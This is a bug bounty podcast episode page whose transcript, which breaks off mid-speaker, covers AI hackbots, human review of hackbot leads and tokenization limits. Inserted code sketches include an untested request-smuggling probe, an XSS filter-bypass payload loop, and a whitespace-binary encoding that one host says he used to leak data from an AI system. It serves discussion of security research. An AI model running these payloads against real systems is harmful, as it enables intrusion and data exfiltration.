Episode 129: Is this how Bug Bounty Ends?

Episode 129: In this episode of Critical Thinking - Bug Bounty Podcast we chat about the future of hackbots and human-AI collaboration, the challenges posed by tokenization, and the need for cybersecurity professionals to adapt to the evolving landscape of hacking in the age of AI.
Follow us on twitter at: https://x.com/ctbbpodcast
Got any ideas and suggestions? Feel free to send us any feedback here: info@criticalthinkingpodcast.io
Shoutout to YTCracker for the awesome intro music!
====== Links ======
Follow your hosts Rhynorater and Rez0 on Twitter:
====== Ways to Support CTBBPodcast ======
Hop on the CTBB Discord at https://ctbb.show/discord!
We also do Discord subs at $25, $10, and $5 - premium subscribers get access to private masterclasses, exploits, tools, scripts, un-redacted bug reports, etc.
You can also find some hacker swag at https://ctbb.show/merch!
====== This Week in Bug Bounty ======
Improper error handling in async cryptographic operations crashes process
https://hackerone.com/reports/2817648
Recon Series #6: Excavating hidden artifacts with Wayback Machine
https://www.yeswehack.com/learn-bug-bounty/recon-wayback-machine-web-archive
====== Resources ======
This is How They Tell Me Bug Bounty Ends
https://josephthacker.com/hacking/2025/06/09/this-is-how-they-tell-me-bug-bounty-ends.html
Welcome, Hackbots: How AI Is Shaping the Future of Vulnerability Discovery
https://www.hackerone.com/blog/welcome-hackbots-how-ai-shaping-future-vulnerability-discovery
Glitch Token
https://www.youtube.com/watch?v=WO2X3oZEJOA
Conducting smarter intelligences than me: new orchestras
https://southbridge-research.notion.site/conducting-smarter-intelligences-than-me
====== Timestamps ======
(00:00:00) Introduction
(00:04:05) Is this how Bug Bounty Ends?
(00:11:14) Hackbots and handling leads
(00:20:50) Hacker chain of thought & Tokenization
(00:32:54) Context Engineering
Title: Transcript - Thu, 03 Jul 2025 12:34:33 GMT
Date: Thu, 03 Jul 2025 12:34:33 GMT, Duration: [00:36:15.42]
[00:00:00.96] - Justin Gardner
That resulted in a single token. So SolidGoldMagikarp is one token. And in GPT-2, if you ever mentioned SolidGoldMagikarp, it thought you were saying, like, f-you or something. You've got to look this up. There's a YouTube video about it. Anytime you said that, it would respond, it would, like, curse at you. It was really funny. Best part of hacking, when you can just, you know, critical things. Yeah, soon.
[00:00:40.00] - Justin Gardner
Alrighty. Sup y'all? We've got this week's 'This Week in Bug Bounty' segment, and what we've got on the docket this time is a couple of updates.

YesWeHack has a new article that came out not too long ago, Recon Series #6, entitled Excavating Hidden Artifacts with Wayback Machine and Other Web Archive Tools, which I thought was particularly timely today, because I am taking a break from hacking something, during which I just had a breakthrough using these tools, to come and tell you about these tools. So if you're not familiar with how to use waymore, or if you're still using gau like I was, then you should definitely read through this article and get up to date on using waymore to do a little bit more thorough investigation of the archive. The Wayback Machine is definitely a pivotal piece of technology for hackers. Also, I know that they're always raising funds. Like, they're always like, please give us money so that we can continue running this nonprofit. We need to keep this thing alive, guys, because countless crits have been popped because of the Wayback Machine. And this article is a really great way to get up to date on it using waymore, LinkFinder, gau, all sorts of stuff. So definitely check it out.

All right, second update is from a HackerOne disclosed report. This one was report 2817648. And check this out, guys: this is a C++-related error where SignTraits::DeriveBits, a C++ function in the Node.js core source code, may incorrectly call ThrowException on user-supplied input in a background thread, crashing all of Node.js. The reason this is relevant is because you can affect availability completely, and things getting passed into these cryptographic functions are often untrusted user input. So this is definitely something you want to keep an eye out for. I went and checked the patch for this, and essentially the patch was just checking whether it should be able to throw or not. And so I think that there's a couple of ways this could be exploited. Obviously we don't want to affect availability too much, but if you have some way to fingerprint that it's running on an older version of Node.js, then this could be a really cool attack.

And while I was researching it, I actually came across this other exploit that was released in that same May 2025 update, which is an improper header block termination in llhttp, the HTTP parser used by Node.js. And this was actually found by Ben Kallus, who is the guy from HTTP Garden who we've talked about a couple of times. Essentially it allows for improper termination of HTTP/1 headers using \r\n\rX rather than the required \r\n\r\n. So very, very interesting piece. If you're interested in request smuggling, this could be something that you could use to potentially trigger some really impactful request smuggling vulnerabilities. It only got a medium and didn't get a ton of attention somehow, but I know that a lot of you guys have really intense HTTP request smuggling automation out there, so this would be a good one to toss on it. All right, that's all for the This Week in Bug Bounty segment. Let's go back to the show.

All right, listen, dude, I've got a little bit of a bone to pick with you. Okay? This blog post, This Is How They Tell Me Bug Bounty Ends. Is this FUD? Dude, is this FUD or is this not FUD? Because I read it and I was like a little bit moved.
But also I'm like, I don't know.
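For the smuggling-automation folks: here's a rough sketch of what probing for that llhttp header-termination quirk could look like, in Python over a raw socket. The hostname is a placeholder, the exact byte layout is an assumption based on the advisory's \r\n\rX description rather than a tested PoC, and you should only point it at systems you're authorized to test.

```python
# Hypothetical probe for the llhttp quirk discussed above: llhttp accepted
# "\r\n\rX" where "\r\n\r\n" is required to end the header block, so a strict
# front-end and a lenient Node.js back-end may disagree on where headers end.
import socket

def probe_header_termination(host: str, port: int = 80) -> bytes:
    raw = (
        b"GET / HTTP/1.1\r\n"
        b"Host: " + host.encode() + b"\r\n"
        b"\rX"                               # malformed terminator under test
        b"GET /smuggled HTTP/1.1\r\n"        # bytes a lenient parser may treat
        b"Host: " + host.encode() + b"\r\n"  # as a second, smuggled request
        b"\r\n"
    )
    with socket.create_connection((host, port), timeout=5) as s:
        s.sendall(raw)
        return s.recv(4096)  # inspect manually: one response back, or two?

if __name__ == "__main__":
    print(probe_header_termination("smuggling-lab.example"))
```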
[00:04:28.20] - Joseph Thacker
I've been in some meetings with you where you felt pretty moved.
[00:04:31.37] - Justin Gardner
Yeah, I am. I am moved. I am moved. And I'll be transparent about it. I mean, this blog post definitely made me realize that if I really, really do want to stay ahead of the curve, right, by a lot, then I need to start doing, you know, AI-agent-based hacking now.
[00:04:53.06] - Joseph Thacker
You need to be more enhanced by.
[00:04:55.45] - Justin Gardner
Yeah, yeah. And if I want to perform at the highest level. Right. I mean, yeah, I think, I think.
[00:05:01.93] - Joseph Thacker
That the reason why I tweeted it in such a way where it's like, you might love this or you might hate this, and the reason why the blog post even reads in like an ambiguous, just slightly ambiguous way, is because I feel the same way. Right? I'm in the same boat as you. Like, it's hard for me to even tell if it is FUD, but it's just my honest opinion, and, you know, maybe you'll tease that out.
[00:05:21.12] - Justin Gardner
For the people who haven't read the blog post, give us like the TLDR of it.
[00:05:24.20] - Joseph Thacker
I think the major points I wanted to make: people who are putting their head in the sand and think that AI is not going to be able to do what human hackers can do, they're wrong. They're crazy. You know, I've met with a lot of hackbot founders, I'm an advisor for Ethiack, and so I think that these models can definitely hack. And I think that the people on the other end of the spectrum are wrong too. Like, people who think that all the bug bounty hunters are going to be out of their job in six months or a year are also wrong. And so this blog post is basically me laying out what I think is going to happen. I guess I can give you like a two-sentence summary of that. I basically think that the first step in the transition is going to be called, like, hacker in the loop, or, you know, basically human in the loop. You're going to have top hackers like you, or, you know, other top hackers, using AI to hack faster, better, smarter, and also, the AI actually needs us to vet a lot of what it thinks is true positive, because it just takes a lot of context and a lot of skill to really know when something is a true positive.
[00:06:24.82] - Justin Gardner
Are we going to have that context, though, if we're not in the weeds? Like, that is one of the things that's really interesting to me. Like, sure, I can be like, hey, look, here's the single point of failure in the system. If you can fuzz this and get it to return a domain that is not in this specific allowlist or whatever, then we've got an SSRF or whatever, and then hand it to the AI and let it do all of the intelligent fuzzing and context-aware stuff. But that's me, you know, using the AI sort of as a tool, and my context is greater than the AI's context. And I'm wondering if it's ever going to get to the point where my context is lower and the AI's context is greater, and that is how we hack.
[00:07:05.36] - Joseph Thacker
Yeah. So just for the topic of this conversation, it might not be called this, but let's call that a black box hackbot. Right. So for black box hackbots that are basically just set to go hack on a domain, it's less of a tool and more of like a fully embodied agent. Right. And then it comes back to you and it's like, hey, these are the leads. I think for a lot of those you will be able to vet them very quickly. Like, let's say it came back to you, as a front-end guy, and it's like, hey, I think there's a client-side path traversal here. And here's my request, that's a PoC, and here's the response that appears, and here's the screenshot from the headless browser. You know, is this true? Don't you think you'd be able to vet it without having to dig up much? You could. Yeah, yeah. And so I think that that's the case. There will be some that are really complex, where it's like, I don't know if this is working or not, you know, but I think that in general those are going to be the ones that are the last to be found. I think that, like, the AI says, I think XSS is popping here, because here's the input, here's the response from the server, and here's the screenshot of the alert box. And you're like, well, that's a pretty open-and-shut case, right?
[00:08:09.18] - Justin Gardner
Yeah, exactly.
[00:08:10.11] - Joseph Thacker
And so, yeah, I think it just really varies vulnerability to vulnerability. And maybe that's why it gets so complex to talk about, is because there are some bugs that AI will not be able to find for 10 years, maybe, or 30 years. Right. But there are a lot of other vulnerabilities that I think AI will be able to find. And as soon as the price point is low enough where they can spin up. Well, I always call this the hackbot singularity. But if there's a point at which you can spin up a hackbot and it costs $10 a run, but it makes you $20 in bounties, any sane person is just gonna spin up as many as they can until it becomes unprofitable. Right, right.
[00:08:42.28] - Justin Gardner
Yeah. And I mean, that's the same sort of thing you see applying those same principles from business with advertising and stuff like that. Right. Like, if you have an advertising model that is generating you $10 and costs $5, then you're just going to keep pressing that button as fast as you possibly can. Yeah, yeah. And I can definitely see that happening. I definitely agree with you that there will be a lot of value to these agents that are, you know, black box agents. But I think the main thing that I'm convinced on right now, after our talks and after just a couple of timely interactions, plus your blog post, right: I fed something that I was working on to Gemini the other day, and Gemini took it and ran some tools to parse it and really did something with it. And it's interesting that we were talking about this off air, about how it's a little bit less good with binary-based stuff. This was one of those cases where it was a base64-encoded binary protocol, and I was like, oh my gosh, this is crazy.
[00:09:48.99] - Joseph Thacker
Yeah, that's a little pro tip. Anytime you're dealing with something that requires, like, tight accuracy. I was dealing with a neat AI-related kind of bypass I was working on, where I needed to convert the data I was trying to leak into binary, but where the 0 was a newline and the 1 was a space. And so I wanted the model to basically write me a payload, or write a little server that would handle that well and stuff. And because it was weird syntax, you know, the AI has never been trained on binary that's spaces and newlines, probably. It kept messing up the format, and I was like, just use your code interpreter tool to convert it. So then it wrote it in binary, then converted it for me in its little code interpreter. And that's a really good pro tip. When you're dealing with stuff like you're talking about, just tell it, like, hey, you keep being inaccurate, use your code interpreter tool here.
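A minimal sketch of the whitespace-binary encoding Joseph describes here, with 0 as a newline and 1 as a space; the helper names are made up for illustration.

```python
# Each bit of the leaked data becomes whitespace ("\n" for 0, " " for 1),
# which is exactly the kind of character-level task a model will fumble and
# a code interpreter will not.

def to_whitespace_binary(data: bytes) -> str:
    bits = "".join(f"{byte:08b}" for byte in data)
    return "".join("\n" if bit == "0" else " " for bit in bits)

def from_whitespace_binary(encoded: str) -> bytes:
    bits = "".join("0" if ch == "\n" else "1" for ch in encoded)
    return bytes(int(bits[i:i + 8], 2) for i in range(0, len(bits), 8))

secret = b"api_key=123"
wire = to_whitespace_binary(secret)
assert from_whitespace_binary(wire) == secret  # round-trips cleanly
```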
[00:10:34.94] - Justin Gardner
Yeah, that's a great call. Yeah, the code interpreter in that specific environment did phenomenally well. And it was kind of a jaw-drop moment for me. I was like, I gotta start integrating this a little bit more. And then your blog post came out like the same day and I'm like, shit, shit, shit, shit, shit.
[00:10:51.58] - Joseph Thacker
It does take a lot of time to write a good prompt sometimes for these really complex vulnerabilities that we're often chasing down as hackers. But I think that if you take the time to do it and give it to smart models, like the latest Gemini 2.5 Pro or, you know, even o3 Pro, which just dropped, I think that they'll often surprise you. Like, I think that a lot of hackers would be surprised by how much it would speed them up, or by how many just good ideas it's going to have.
[00:11:16.51] - Justin Gardner
Yeah. And just sort of tangentially related to this. And, and as a counterpoint to the whole agent thing, I've been following a little bit the Hacktron AI folks.
[00:11:26.24] - Joseph Thacker
Yep.
[00:11:26.91] - Justin Gardner
And yeah, I think one of the founders, I forget who it was, I can't find the tweet right now, tweeted something out like: this is the future of hacking. I set Hacktron AI to work on this and I went and grabbed a coffee, and then I came back and I had four leads to follow. Right. And then, you know, I went and followed those and maybe popped one of them or whatever. Right.
[00:11:45.69] - Joseph Thacker
Yeah.
[00:11:46.00] - Justin Gardner
And I think that's an interesting take, because it's not necessarily saying that Hacktron AI is going to just, you know, you're gonna go grab coffee and come back and Hacktron is like, here's your report. But maybe it can identify things that are higher-signal sketchy than normal programmatic tools can.
[00:12:05.94] - Joseph Thacker
Yeah.
[00:12:06.46] - Justin Gardner
Right. Or non-AI-using tools can. And then you feed those leads to, you know, a closer. Right. We've talked about this a little bit on the pod before, how you've got people with various skill sets in bug bounty. Some people are really good lead generators, as far as finding sketchy stuff goes, and some people are really good exploitationists, right, or exploitists, and they can close the vuln. And I think maybe another interesting position for AI could be that it will produce really good leads and hand them to a talented exploitist to close the loop on.
[00:12:41.50] - Joseph Thacker
Yeah. So this is something I've talked about. Not only am I an advisor for one hackbot company, but for the other ones, when I do a call with these founders, as kind of like a VC scouting thing, I will often give them really great advice, just because I love adding value to the world and I want to see everything improve. But I genuinely think that how these hackbot companies handle leads is going to be huge. And it's because of exactly what you're talking about. Right. Every lead is a potential vuln, and I think that some of the companies are over-indexing on fully black box. The reason why I mentioned the human-in-the-loop hackbot singularity in my blog post as, like, a midterm spot is exactly what you're talking about. And here's my exact quote on it. I said: one good hacker and a hackbot system working together will be able to out-hack almost everyone from a volume perspective. And that's what I believe. I mean, if I could feed you a list, Justin, of, I don't know, 10 potential XSS and 10 potential CSPT and 10 potential RCE via command injection, and you're literally just vetting them, like, oh yeah, that one is a bug. Nope, that one's not. Yeah, that one is. If they're actually decently high signal, even if it's only like 30% accurate, you would be able to make a lot of money from just reviewing bugs.
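Back-of-the-napkin math on that: every number here beyond Joseph's 30% figure is invented purely for illustration.

```python
# Even a 30%-accurate lead feed pays off if human review is cheap.
leads_per_day = 30          # leads the hackbot surfaces daily (assumption)
precision = 0.30            # fraction that are real bugs, per Joseph's figure
avg_bounty = 1_500          # hypothetical average payout per confirmed bug
review_minutes = 10         # hypothetical human vetting time per lead

bugs = leads_per_day * precision
daily_payout = bugs * avg_bounty
hours_reviewing = leads_per_day * review_minutes / 60
print(f"{bugs:.0f} bugs/day -> ${daily_payout:,.0f} for {hours_reviewing:.1f}h of review")
# 9 bugs/day -> $13,500 for 5.0h of review (under these made-up numbers)
```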
[00:13:55.49] - Justin Gardner
And it's almost like what we see with the Critical Thinkers hack-alongs, right? Like, with the hack-alongs, obviously we have a ton of super talented hackers participating, and in the Critical Thinking Discord. But I've been surprised by a couple of people that, you know, I would consider solid intermediate hackers. Right. You know, that are getting really good at some stuff but are definitely fresher on the scene. Right. And, you know, when we're hacking together, I'm going down one route, and then almost every single time somebody will drop in the chat and be like, hey, look at this sketchy thing that I just found.
[00:14:30.30] - Joseph Thacker
Yep.
[00:14:30.66] - Justin Gardner
Right. And I just love that, right? Because it's like, okay, and then, you know, I'll take that and close the loop on it and exploit it or something like that, or maybe somebody else who's better than me in the chat will do it, you know. And it happens almost every time we do a hack-along, right. And I think, just applying this to AI, if you can get the AI to be at the level of an intermediate hacker, as far as intuition of whether a functionality is sketchy or not, then essentially hacking becomes: here's a bunch of leads from an intermediate, skilled hacker. Now your job is to be the closer.
[00:15:06.83] - Joseph Thacker
Yeah, I think it's much more likely that it's able to find the sketchy leads than it is to be able to be a closer. Like, I think that the closer is going to come later. I do think its big upside, the big advantage it has in closing, is infinite time, like near-infinite time and near-infinite attempts. Right. So if it's trying to find a very specific payload that will bypass a specific filter, it can try infinitely, right? Assuming that the financial incentives align, it can literally try as many times as it wants. And it's infinitely patient. Right. And so I think that really, that's the advantage on it being a closer, is that it can just try so many things in such a short amount of time, and you can scale it up so well. But I think in general it's going to be much better at finding the weird things.
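A toy sketch of that infinitely patient retry loop: the WAF rule and payload list here are hypothetical stand-ins, where a real hackbot would have a model generate the next candidate instead of walking a fixed list.

```python
# Keep trying candidate payloads until one slips past the filter.
CANDIDATES = [
    "<img src=x onerror=alert(1)>",
    "<IMG SRC=x ONERROR=alert(1)>",   # case variation
    "<svg onload=alert(1)>",          # different event handler entirely
]

def waf_blocks(payload: str) -> bool:
    # Hypothetical case-sensitive WAF rule.
    return "onerror" in payload

def close_the_loop(candidates: list[str]) -> str | None:
    for attempt, payload in enumerate(candidates, start=1):
        if not waf_blocks(payload):
            return f"bypass on attempt {attempt}: {payload}"
    return None  # in Joseph's framing, you would just keep generating more

print(close_the_loop(CANDIDATES))  # the case-flipped variant gets through
```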
[00:15:48.53] - Justin Gardner
Those people that have taken notes really have a massive advantage now with AI as well. Like, you know, I have been a largely intuition-based and just reps-based hacker to this point, and I don't have a massive Notion or whatever filled with how I approach every single target and every note from every live hacking event. And I'm really wishing I did now, because this is a massive opportunity for us to say, hey, you know, sometimes if you change the Host header on a password reset, then it's going to trigger this thing. And just give them all of the weird shit you've seen, every single weird shit you've seen. Right. And then hope that it has the ability to properly implement that and alert you if something looks even remotely sketchy, you know, and draw those techniques back to your mind. Because we've talked about this time and time again, how some vulns are popular for a period and then you stop testing for those, because, for whatever reason, maybe you got shiny object syndrome and now you're looking for this new thing.
[00:16:47.62] - Joseph Thacker
Well, I mean, none of us are as disciplined as Spaceraccoon, to go through, like, a spreadsheet of all the vulns to check across every API endpoint. Right?
[00:16:55.14] - Justin Gardner
Yeah, exactly. Yeah, it's a lot, man. It's a lot. And I think AI can really help with that. So yeah, man, for those of you that have really good, detailed notes on your methodology, this is like a big dub for you.
[00:17:07.23] - Joseph Thacker
Yeah, I think so.
[00:17:09.00] - Justin Gardner
Shout out to my boy Gret me.
[00:17:10.00] - Joseph Thacker
I know, I was about to say that exact thing. I was like, I know the guy who does that. Yeah. So I don't know that I said all of my other major points that I wanted to make with this. The other thing that I wanted to make a point of, just to kind of call my shot here: I think we'll hit that human-in-the-loop hackbot singularity by the end of the year, and there will be a company that farms 500 to 1,000 vulnerabilities by the end of the year. And I think that that's going to be very impressive. I mean, XBOW is already, like, the quote-unquote top hacker in the US. And I think that it's exactly what we're talking about. Right. I'm sure there are human hackers vetting behind it, and honestly, the bug bounty platforms need to decide how they're going to handle that, because it's kind of a shared account.
[00:17:51.45] - Justin Gardner
Yeah, yeah, that's interesting.
[00:17:53.45] - Joseph Thacker
But it is something that we need to think about.
[00:17:55.13] - Justin Gardner
Well, HackerOne released something on that, right? Like, HackerOne on hackbots. Yeah. And we super lightly covered it on the pod. But there is a write-up from one of the co-founders, Michiel, on Welcome, Hackbots: How AI Is Shaping the Future of Vulnerability Discovery. We'll link it, we'll link it again. But yeah, I mean, I think that they don't really have any choice but to allow hackbots to compete. But maybe there's a separate leaderboard, or maybe you can flag a specific account as a hackbot account or something like that. I don't know.
[00:18:29.45] - Joseph Thacker
Yeah. So another thing that I wanted to get across with it was just positivity amidst job loss. Like, I think that there will be impact to hackers for sure in the long term, but I think in the medium term people can be really encouraged, because one, we will need humans in the loop. So I do think hackers should maybe think about what they want that to look like, and maybe either make it known on social media or reach out to these hackbot companies. I think that the best model for this is contract-based work rather than hiring these bug hunters. Like, bug bounty hunters love being full-time. I do. And so I would love it if the model is such that I'm kind of, like, sponsored by Ethiack or whatever, and then I use that as my daily driver, to both improve their product and split the bounties with them, and, you know, we both kind of get the exposure for it. I think that'd be a lot better. But I mean, honestly, if you're a bug bounty hunter and you are kind of worried about this, maybe looking to apply to hackbot companies is a smart decision. I do think there will be a lot of money wrapped up in this, for multiple reasons. One is, it's just huge for humanity to be able to secure everything in an automated fashion. Two, it's like a very strong nation-state-related superpower. Like, I am a believer that AI alignment is a really big deal, and in the issues that could arise from a, you know, somewhat unsafely wielded AI. Like, if there's a nation state that we don't trust down the line and they're using AI to do nefarious things, they're going to want to use it for biowarfare and they're going to want to use it for hacking. And so, I don't know, by contributing to this effort, I think that you're kind of helping humanity in a really powerful way too.
[00:20:08.73] - Justin Gardner
Yeah, yeah, yeah. So anyway, my takeaway from your blog, and just my experiences at that point, was really: I need to begin the process of taking my methodology and what I'm doing and getting it into prompts, getting it into, you know, something that's RAG-able or something, so that the AI can eventually use it, once we have, particularly, these more human-in-the-loop hackbots sort of thing going on. So I don't know, it's a little bit of a hard thing for me, because I'm like, I don't really feel like taking a break from the hacking, you know, to really dev on this a lot and try to get it to a point where I can do this. But I'm kind of at the point where I kind of have to do that.
[00:20:52.13] - Joseph Thacker
So yeah, two things, and we're prone to go down rabbit holes, so I'm just telling you these now so we don't forget to touch them.
[00:20:57.32] - Justin Gardner
Yeah.
[00:20:57.73] - Joseph Thacker
One is what you're talking about right now. I want to talk about the hacker thought process as they exploit bugs. But the second thing I want to talk about with you is tokenization. I know we talked about that off air, and I want to circle back to that.
[00:21:11.65] - Justin Gardner
Yeah. And also, what we need to do is just go over to the doc right now and write some of those down. So, tokenization. And what was the other one you said?
[00:21:24.02] - Joseph Thacker
Basically, hacker chain of thought, really.
[00:21:26.26] - Justin Gardner
Hacker chain of thought. Yeah.
[00:21:27.54] - Joseph Thacker
And what is, what was yours?
[00:21:28.82] - Justin Gardner
What mine was, was this other note as well, which is: the reason that I got out of the automation game, you know, back in like 2022, is that I don't like coding as much as I like hacking. Yeah, right. And I found that I was spending a lot of my time coding instead of hacking. Yep. And that changed a lot recently, you know, with the onset of AI-assisted coding. So one of the things I've considered is, that passive income piece, passively finding bugs, has always been really attractive, but it was offset by the thing I didn't like, which is that I had to code all the time. And that offset has been erased by AI a little bit, or at least lessened. So I am definitely putting more thought and consideration into going back into the automation game, whether it be hard automation or AI-based automation, with supplementation from code-assisting AI.
[00:22:23.96] - Joseph Thacker
Cool. Yeah. So the two things I want to mention. One was the chain of thought from hackers. This is just kind of a pro tip: for one, when you take down your notes, but two, I think for these hackbot companies, and three, just for other hackers. The ideal context for an AI model when it's trying to exploit a CSPT is your thoughts. And I mean literally Justin Gardner's thoughts, because I think you're probably one of the foremost CSPT people, right? And you have an extremely good chain of thought in your brain. Basically your notes: why do you think CSPT exists here? Okay, write that down. Okay, what is the first thing you're going to attempt, to check whether it exists there? Okay, write that down. Okay, it failed because of this. So your next payload is going to be what, and why? And okay, that failed. Okay, your next payload is going to be what, and why? Oh, it worked. Okay, cool. So you found it. Okay, now how do we leverage this into a vulnerability? Okay, what do you look for next in the application? Okay, write that down. Right. Basically every thought you're having as you're exploiting something is the ideal context for an AI language model when it's trying to exploit the exact same thing. And so I've always wanted to have, like, Sam Curry's internal monologue. I've even made a little app called Internal Monologue Capture. I think that internal monologue capture is actually a space for a product here, if there was some way where it would continually ask you questions or ask you to talk out loud, and then it would capture that for you. Anyways, expert internal monologue capture is something me and Daniel Miessler talked about over a year ago when I was hanging out at his house at RSA. And I still think it's super key today.
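One possible shape for capturing that chain of thought so it can be replayed to a model later; every field and helper name here is invented for the sketch, not any real tool's format.

```python
# Structure the "hacker chain of thought" Joseph describes, so it can be fed
# to a model as exploitation context later.
from dataclasses import dataclass, field

@dataclass
class Attempt:
    payload: str    # what you tried
    reasoning: str  # why you thought it would work
    result: str     # what the app actually did

@dataclass
class HuntLog:
    target: str
    hypothesis: str                 # why you think the vuln exists here
    attempts: list[Attempt] = field(default_factory=list)
    outcome: str = "open"

    def to_prompt(self) -> str:
        steps = "\n".join(
            f"- tried `{a.payload}` because {a.reasoning}; saw: {a.result}"
            for a in self.attempts)
        return (f"Target: {self.target}\nHypothesis: {self.hypothesis}\n"
                f"Attempts so far:\n{steps}\nOutcome: {self.outcome}")

log = HuntLog("acme.example", "CSPT: userId lands in a relative fetch() path")
log.attempts.append(Attempt("../admin", "escape the /api/user/ prefix",
                            "404 -- path normalized client-side"))
print(log.to_prompt())  # paste this as context for the next session or model
```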
[00:23:59.17] - Justin Gardner
Dude, abso-freaking-lutely. And I think that is so hard to do. And I have a lot of experience with that because of the mentor-mentee relationship, where a lot of times what I'll do with these mentees is I'll hack on something and just narrate what I'm doing.
[00:24:17.49] - Joseph Thacker
Yeah.
[00:24:17.80] - Justin Gardner
And my mentees are probably going to be like, shut the fuck up, Justin. Because what it actually sounds like is: oh, guys, check this. And then I just stop talking. And they're like, what do you mean? What do you mean? And I've been trying to get better at it. And anybody who listens to the hack-alongs also knows that I am very prone to start narrating something and then get hijacked by, like, oh, I need to allocate all of my mental resources to this one thing really quickly, and then not finish my thought. But I think as you get more reps with that, that is going to be a very valuable skill. And especially if there's some product like you're saying, that will essentially just be listening to me talk. Because I feel like that is the most natural way of conveying your thoughts without friction to yourself, and then converting that into a chain of reasoning that the AI can consume to mimic your skill set in a specific area.
[00:25:10.56] - Joseph Thacker
Right. It becomes basically the perfect system prompt for a sub-agent that wants to exploit that same vulnerability.
[00:25:15.45] - Justin Gardner
Yeah.
[00:25:16.00] - Joseph Thacker
All right. Tokenization. So I found the quote from Karpathy.
[00:25:19.13] - Justin Gardner
Yeah.
[00:25:19.56] - Joseph Thacker
So if anyone's listening and you don't know what tokenization is, you need to go look it up. But I'll summarize it in like two sentences here. Tokenization is the way that AI models view the world, because they've been trained on what are called tokens. Tokens are just strings that are associated with numbers, and those numbers are what the model technically outputs. Whenever it answers your question or whatever, it just gets converted back to the token, which is back to the string, which is sometimes a full word, sometimes only a character. You can look up tokenizers to see how it works. But the whole point is, tokenizers are the root of all problems. So I really love this. This is from Andrej Karpathy, the father of modern LLMs and AI. He's very well known, well regarded. Why can't an LLM spell words? Tokenization. Why can't LLMs do super simple string processing tasks, like reversing a string? Tokenization. Why are LLMs worse at non-English languages, like Japanese? Tokenization. Why are LLMs bad at simple math? Tokenization. Why did GPT-2 have more than necessary trouble coding in Python? Tokenization. Why did my LLM abruptly halt when I sent it the string <|endoftext|>? Tokenization. Yeah, like, why does it break whenever I ask about SolidGoldMagikarp, which you don't know about? You should go watch that YouTube video about it.
[00:26:32.04] - Justin Gardner
What the.
[00:26:32.41] - Joseph Thacker
No, you don't know about this?
[00:26:33.41] - Justin Gardner
No.
[00:26:33.76] - Joseph Thacker
There's a thing called glitch tokens. So glitch tokens don't really exist anymore, but basically, when they were scraping the training data from Reddit, there were a few strings, like SolidGoldMagikarp, camel case but with no spaces, that resulted in a single token. So SolidGoldMagikarp is one token. And in GPT-2, if you ever mentioned SolidGoldMagikarp, it thought you were saying, like, f-you or something. You've got to look this up. There's a YouTube video about it. Anytime you said that, it would respond, it would, like, curse at you. It was really funny. So you've got to go look this up. It's called Glitch Tokens, and it's by Computerphile on YouTube. I'll put it in the show notes. Anyways, the whole point is, our brains see the world and we're somehow able to switch between views, so we can see the world as words, like when we read a book, but we can also see the world as characters when we need to. Right? Like special characters. And so we have this kind of superpower that AI doesn't have. And I was bringing this up to Justin before we started this episode, but I wanted to mention it because, like, AI doing things like HTTP desync attacks or request smuggling is basically impossible due to tokenization, because it can't count. It doesn't really understand how to count the number of spaces it's using, and that's more of an arithmetic thing, right? And so maybe it'll be able to figure it out if it writes two parts of a smuggled request and then sends both of them into Python code to count the number of chars, to then set the Content-Length. But it's going to be super hard. And that's an example of a vulnerability that, like, I don't know if AI will solve even 10 years down the road. It's going to be a vulnerability that takes a very long time. Like, maybe we don't even use tokenizers eventually, because there have been some theories that eventually we can just make each character a token and train a model that's good like that. And if it viewed the world in characters, I think it could potentially pull it off. But anyways, tokenization is really fascinating and interesting, and I think that it does impact the amount of vulnerabilities that can and cannot get automated at the moment.
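A small sketch of both halves of this, assuming OpenAI's tiktoken library (pip install tiktoken) and its GPT-2 encoding: first, that the model sees token IDs rather than characters, which is why character counting is unreliable; second, the "do the counting in code" workaround Joseph mentions, with placeholder request bytes.

```python
import tiktoken

# The model never sees characters, only token IDs.
enc = tiktoken.get_encoding("gpt2")
for text in [" SolidGoldMagikarp", "strawberry", "\r\n\r\n"]:
    ids = enc.encode(text)
    print(f"{text!r}: {len(text)} chars -> {len(ids)} token(s) {ids}")
# " SolidGoldMagikarp" famously collapsed to a single GPT-2 token, which is
# what made it a glitch token.

# The code-interpreter trick: never let the model guess byte counts. Compute
# the Content-Length of a (placeholder) request body in code instead.
body = b"x=1&smuggle=true"
prefix = (f"POST /submit HTTP/1.1\r\nHost: victim.example\r\n"
          f"Content-Length: {len(body)}\r\n\r\n").encode()
print((prefix + body).decode())
```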
[00:28:26.60] - Justin Gardner
I definitely didn't think about the fact, before you mentioned it right before this episode, that these LLMs are thinking and living in the token world from an output perspective as well as an input one. I knew that from an input perspective. But they're also outputting tokens, and if they don't have access to a specific set of tokens, then they're not going to output, or maybe the weights are off and they're not going to output, the token that you need, even though that was very clearly articulated as the purpose or whatever.
[00:28:59.16] - Joseph Thacker
Yeah.
[00:28:59.72] - Justin Gardner
And that's where I think the difference comes in between, like, actual artificial intelligence and, you know, fabricated artificial intelligence here. And that is something that I really hadn't thought about.
[00:29:11.16] - Joseph Thacker
Because I will challenge your last assumption there. We also hallucinate. Sometimes we can't think of the word. Sometimes it pops up in a different way. I mean, I don't think that they're conscious, I don't think that they have a soul, and we don't have to get into all that. But I do think that just because the way in which these top models think doesn't mirror exactly how we think, I don't think that means they're not necessarily reasoning. There's some really interesting research from Anthropic that shows that even before a model outputs a token, it passes through different circuits in its internal next-token prediction that mimic very similar thinking. It's bouncing around on different topics that are all related to the answer even before it emits a single token. It's very, very fascinating stuff.
[00:29:55.89] - Justin Gardner
Yeah, but that is very interesting. I'm definitely not smart enough to make a qualified assertion about that. That's fine.
[00:30:02.36] - Joseph Thacker
But what you're talking about there with the words is, like, very fascinating. There are some weird token examples. I've been using, sorry, not Cursor. Chorus. Chorus is like a really cool thing. I used to use Msty; now I use Chorus to ask one question to multiple models at the same time. If you haven't used it, it's great. But I saw someone talking about this on X, with Gemini 2.5 Pro putting in a cheeky Russian word. They asked the question in English, and all the models answering in parallel responded in English. But Gemini 2.5 Pro threw in a random Russian word, and it meant the exact same thing. Like, you could understand it if you read it in English, because it was some word where you could easily tell what it should have been in English. But it clearly just lived in the latent space of the weights at the exact same spot, and so it just picked the wrong token as it was passing through. And so, anyway, stuff like that's really interesting, and I'm surprised we don't see more of it.
[00:30:51.83] - Justin Gardner
